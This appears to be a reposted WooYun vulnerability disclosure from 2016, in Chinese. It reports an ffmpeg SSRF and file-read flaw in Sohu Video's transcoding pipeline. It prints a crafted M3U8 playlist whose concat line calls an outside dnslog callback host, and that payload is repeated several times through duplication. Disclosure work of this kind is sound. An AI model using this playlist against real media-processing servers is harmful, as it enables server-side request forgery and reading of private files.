搜狐视频ffmpeg漏洞可文件读取/SSRF
漏洞标题 搜狐视频ffmpeg漏洞可文件读取/SSRF 相关厂商 搜狐 漏洞作者 荒废的腰子 提交时间 2016-05-06 16:14 公开时间 2016-06-20 16:30 漏洞类型 命令执行…
漏洞标题
搜狐视频ffmpeg漏洞可以是文件读取/SSRF
相关制造商
搜狐
漏洞作者
腰部荒凉
提交时间
2016-05-06 16: 14
公共时间
2016-06-20 16: 30
漏洞类型
命令执行
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
远程命令执行
漏洞详细信息
1.上传视频并开始转码
2.payload
#EXTM3U
#EXT-X-MEDIA-SEQUENCE: 0
#EXTINF: 10.0,
Concat:http://aaa00e.dnslog.info
#EXT-X-ENDLIST
3.cloudeye返回请求
漏洞证明:
1.上传视频并开始转码
2.payload
#EXTM3U
#EXT-X-MEDIA-SEQUENCE: 0
#EXTINF: 10.0,
Concat:http://aaa00e.dnslog.info
#EXT-X-ENDLIST
3.cloudeye返回请求
修理计划:
升级
版权声明:请注明出处。退役腰@乌云
2.payload
#EXTM3U
#EXT-X-MEDIA-SEQUENCE: 0
#EXTINF: 10.0,
Concat:http://aaa00e.dnslog.info
#EXT-X-ENDLIST
3.cloudeye返回请求
漏洞证明:
1.上传视频并开始转码
2.payload
#EXTM3U
#EXT-X-MEDIA-SEQUENCE: 0
#EXTINF: 10.0,
Concat:http://aaa00e.dnslog.info
#EXT-X-ENDLIST
3.cloudeye返回请求
修理计划:
升级
版权声明:请注明出处。退役腰@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 518 )
- 分类:黑客技术
